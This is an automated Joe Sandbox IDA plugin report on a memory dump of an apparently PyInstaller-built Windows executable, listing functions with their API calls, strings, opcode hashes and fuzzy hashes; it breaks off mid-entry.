Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
API String ID: 2446303242-1601438679
Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction ID: 4085a2ea353987b08a0db83893bf0c34fb6999fca4db05a985fc2cc0526a4d9c
Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction Fuzzy Hash: 8AA15A76608F8587E7188F22E49479AB370F789B94F504129DB9D43B24EF7EE164CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D34481C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF61D34486A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D344ED6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D34504C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D34530A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D34552A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345767
memcpy_s.LIBCPMT ref: 00007FF61D345842
memcpy_s.LIBCPMT ref: 00007FF61D3458ED
memcpy_s.LIBCPMT ref: 00007FF61D3459BC

Strings

1#SNAN, xrefs: 00007FF61D34497A
1#IND, xrefs: 00007FF61D344957
1#QNAN, xrefs: 00007FF61D344983
1#INF, xrefs: 00007FF61D344993

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 1922c43916b7ae2b1956b00aa5dfceaf9999fbe18ebc65017c42f663bf9222a2
Instruction ID: 2bebc5c64d5406f67440383333f1225a299cebe505ad375f58ae0790524d4958
Opcode Fuzzy Hash: 1922c43916b7ae2b1956b00aa5dfceaf9999fbe18ebc65017c42f663bf9222a2
Instruction Fuzzy Hash: 40B2D172E18A828BE7648E64D4407FDB7A1FB46BA8F505135DA0997E84EF7DF900CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D328570 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF61D322A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D328597
FormatMessageW.KERNEL32 ref: 00007FF61D3285C6
WideCharToMultiByte.KERNEL32 ref: 00007FF61D32861C

Part of subcall function 00007FF61D3229E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF61D3288F2,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D322A14
Part of subcall function 00007FF61D3229E0: MessageBoxW.USER32 ref: 00007FF61D322AF0

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF61D328626
WideCharToMultiByte, xrefs: 00007FF61D32862D
No error messages generated., xrefs: 00007FF61D3285D0
PyInstaller: FormatMessageW failed., xrefs: 00007FF61D3285E3
FormatMessageW, xrefs: 00007FF61D3285D7
PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF61D328639

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ErrorLastMessage$ByteCharFormatMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2920928814-2573406579
Opcode ID: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
Instruction ID: 950e3cb4e8954a5df18ebcbef52612f0a32cf8e568a2bde8c75857aaa9fd84e6
Opcode Fuzzy Hash: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
Instruction Fuzzy Hash: EB212F71B18E4282F7649F25F85427AA365FF8ABA8F840135E64DC26A4FF3CE545C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D32C67C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF61D32C698
RtlCaptureContext.KERNEL32 ref: 00007FF61D32C6C5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF61D32C6DF
RtlVirtualUnwind.KERNEL32 ref: 00007FF61D32C720
IsDebuggerPresent.KERNEL32 ref: 00007FF61D32C774
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF61D32C795
UnhandledExceptionFilter.KERNEL32 ref: 00007FF61D32C7A0

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
Instruction ID: cc9518ad2db58d9a5173ef12df5d49bee1b60dff053d14e4ccd2517a0278628c
Opcode Fuzzy Hash: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
Instruction Fuzzy Hash: 11316172A08F818AEB649F64E8403EDB364FB85B58F44443ADA4D87B94EF3CD648C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33ACD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF61D33AD51
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF61D33AD69
RtlVirtualUnwind.KERNEL32 ref: 00007FF61D33ADA4
IsDebuggerPresent.KERNEL32 ref: 00007FF61D33ADDD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF61D33ADE7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF61D33ADF2

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
Instruction ID: 06067ddd01f48312da6e246b1ba9d37d807b81d90f814d7e0978b0ef8c2da977
Opcode Fuzzy Hash: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
Instruction Fuzzy Hash: 04318636A08F8185DB64CF25E8442AEB3A4FB85BA4F540135EA9D83B54EF3CD545CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D341FE4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D342030
FindFirstFileExW.KERNEL32 ref: 00007FF61D34213A

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
Instruction ID: 2af7bc1244094f3dc3ab794542148399ba03a34e697067449feb1da2f1a64ff6
Opcode Fuzzy Hash: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
Instruction Fuzzy Hash: ECB1B136B18E9681EA64DB2299502B9E3A1EB46FF4F444131EE5E97B85FF3DE441C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D32C560 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF61D32C58C
GetCurrentThreadId.KERNEL32 ref: 00007FF61D32C59A
GetCurrentProcessId.KERNEL32 ref: 00007FF61D32C5A6
QueryPerformanceCounter.KERNEL32 ref: 00007FF61D32C5B6

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
Instruction ID: 9a7fd946edad202f47d57821187506664df0a854e61f75445afbcba176426802
Opcode Fuzzy Hash: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
Instruction Fuzzy Hash: 7B112E36B14F058AEB00CF61E8542B973A4FB1AB68F440E31DA6D877A4EF7CD1948390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D344380 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF61D3443E6
memcpy_s.LIBCPMT ref: 00007FF61D344411

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 63b8da40aae693d833f692001b3581db735b0227edf4616f27166777d446daae
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: BDC10672B18AC687EB24CF19A04466AF791F785B94F458135DB4E83B84EF7EE801CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D34A0F8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF61D34A347
RaiseException.KERNEL32 ref: 00007FF61D34A358

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 9ceb1b6cde6f3b2eda1c2fc70bd7e1e7d126a653b4f6510e73c9dfb920cedcd9
Instruction ID: 8acb2a48984cdb524cbb1c4b1397f3c071929456e2842067181dea81ce80db8e
Opcode Fuzzy Hash: 9ceb1b6cde6f3b2eda1c2fc70bd7e1e7d126a653b4f6510e73c9dfb920cedcd9
Instruction Fuzzy Hash: 8BB14973604B898AEB15CF29C846369BBA0F785F9CF148921DA5D837A4DF3ED452C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D328B00 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF61D328B31
FindClose.KERNEL32 ref: 00007FF61D328B40

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 8cbeafd55435480eb4b41ebb52a05d3ef2c4ced4829aa63b63a0783ab33de0ca
Instruction ID: 5aae319bc29ed471ec6ea4bc00f222db940c65af5678c052e6f8dce13b135d28
Opcode Fuzzy Hash: 8cbeafd55435480eb4b41ebb52a05d3ef2c4ced4829aa63b63a0783ab33de0ca
Instruction Fuzzy Hash: 54F0A472A19A8186F7608F70E849766F350EB45B38F004739E66D42AD4EF7CD008CA40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D333BE4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF61D333D52
, xrefs: 00007FF61D333F94

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: c4872f1e0598d0dbbdaab36ff9640d642bec52225eb732dc17c9982f250c6bea
Instruction ID: 128b7f3edceacd2a28164f8ef3ba38163bbcd61bc7965511c0d3d13d50b34245
Opcode Fuzzy Hash: c4872f1e0598d0dbbdaab36ff9640d642bec52225eb732dc17c9982f250c6bea
Instruction Fuzzy Hash: 00E1C936A09E4692EB68CF19825013DB3A0FF46F64F149235DA4E87794EF3EE851C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33E5B0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF61D33E6BD
gfff, xrefs: 00007FF61D33E73A

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: dcea56467776434e5e52420c9f77f7819282e5f197dea1188040280776680b59
Instruction ID: 2cea21f0e85c70b7f7a0dfa87c64f7626dbe0234d6a4d5162afdfaaf23348c5a
Opcode Fuzzy Hash: dcea56467776434e5e52420c9f77f7819282e5f197dea1188040280776680b59
Instruction Fuzzy Hash: 0A515876B18AC556E724CE359A00769FB91E746FA4F488331CBAC87AC5EF7DD0458700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33E11C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF61D33E45E

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
Instruction ID: 202e55121f6b6f71b628687e5ac126848827e35878876613be7b7e6cf70b45be
Opcode Fuzzy Hash: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
Instruction Fuzzy Hash: 8EA14672B0CBC686EB25CF25A5007ADBB91AB56BE4F048231DE8D97781EE3DE501C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3387D0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF61D3387EF

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 364e340d20faf9de50e8717f3b14510ebffb82d301b74fd18d9a9a78a8f11498
Instruction ID: 0a86e3671ccb38f1df805af8f683f82d3e241f480723304e627f601d0effc941
Opcode Fuzzy Hash: 364e340d20faf9de50e8717f3b14510ebffb82d301b74fd18d9a9a78a8f11498
Instruction Fuzzy Hash: 9F518131F08E4262FA64EB269B115BAD691AF46FE4F084535DE0ECB7D5FE3DE4028200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D343BF0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF61D343BF4

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 7569e3696a4862237eb2d75a5d3254d27d2728382b8d3a4fb7a9071d2e6cb06f
Instruction ID: 8cc494b2f468c5a63ec0e741c67bfadf119aa67ce9691d8decaeaed350d41166
Opcode Fuzzy Hash: 7569e3696a4862237eb2d75a5d3254d27d2728382b8d3a4fb7a9071d2e6cb06f
Instruction Fuzzy Hash: A8B09230E07E86C2EB482B21AC8621862A47F4AB20F944038C10D81320EE2D21B5DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3337E0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b45cc5b539c2f4a44f5a431b63c23698d5cd8cc6c74fd81da4f2666c4fe2f5
Instruction ID: 4b5fedb9e4917b02b3344cbca351ee8e86c5088ca2f3efd459bf8c6bc7d8bf58
Opcode Fuzzy Hash: e1b45cc5b539c2f4a44f5a431b63c23698d5cd8cc6c74fd81da4f2666c4fe2f5
Instruction Fuzzy Hash: E1D1C536A08E46A6EB68CE29825027DA7A0EF07F68F149235CE4D877D5EF3DD855C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3290D0 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84ec6a3f320757ef13b53a77f9400a9296092c401b576f7c6112a1c9e532824b
Instruction ID: c4821d1a6a98b8163f2bd03087244a1884e06f6f24dbe14b954c7fb1146cbc44
Opcode Fuzzy Hash: 84ec6a3f320757ef13b53a77f9400a9296092c401b576f7c6112a1c9e532824b
Instruction Fuzzy Hash: 19C1D3726141E04BD2C9EB29E45957E73E1F78934DBD4803AEB8B47B89CA3CE418D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D332E50 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4004e6f7831e6380f0c7a9c187e4f56c2fba6a50471e57e5591c0e9cd6f9eb67
Instruction ID: 8268c8a4806c9ddbb1846eb173311741edb8ae008d2f476e89857c1decae7747
Opcode Fuzzy Hash: 4004e6f7831e6380f0c7a9c187e4f56c2fba6a50471e57e5591c0e9cd6f9eb67
Instruction Fuzzy Hash: 23B17D77A08B8595E765CF29C19023DBBA0EB4BF68F288235DA4E87395EF39D441C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33EC30 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
